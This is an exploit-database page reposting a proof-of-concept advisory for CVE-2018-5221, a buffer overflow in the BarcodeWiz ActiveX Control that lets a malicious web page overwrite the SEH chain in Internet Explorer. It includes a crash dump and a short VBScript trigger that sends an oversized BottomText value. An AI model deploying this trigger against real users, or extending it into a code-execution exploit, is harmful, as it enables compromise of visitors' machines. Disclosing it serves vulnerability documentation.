[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC) Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29402
Category
dos / poc
Date add
08-01-2018
Platform
windows
[+] Credits: John Page (aka hyp3rlinx)      
 
Vendor:
=================
www.barcodewiz.com
 
 
Product:
=============
BarcodeWiz ActiveX Control < 6.7
 
BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes; 
Choose from hundreds of label layouts; Export as PDF or XPS.
 
 
Vulnerability Type:
===================
Buffer Overflow
 
 
CVE Reference:
==============
CVE-2018-5221
 
 
Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.
 
 
SEH chain of main thread
Address    SE handler
0018DAC0   kernel32.754E48F3
0018EE34   41414141
41414141   *** CORRUPT ENTRY ***
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL    (BarcodeWiz.DLL)
 
SEH Chain:
--------------------------------------------------
1   41414141    
 
 
Called From                   Returns To                    
--------------------------------------------------
BarcodeWiz.2045665            BarcodeWiz.202FF50            
BarcodeWiz.202FF50            41414141                      
41414141                      41414141                      
41414141                      41414141                      
41414141                      41414141                      
41414141                      41414141                      
41414141                      41414141   
 
 
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
 
 
Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>
 
PAYLOAD=String(12308, "A")
 
VICTIM.BottomText = PAYLOAD
 
</script>

#  0day.today [2024-12-24]  #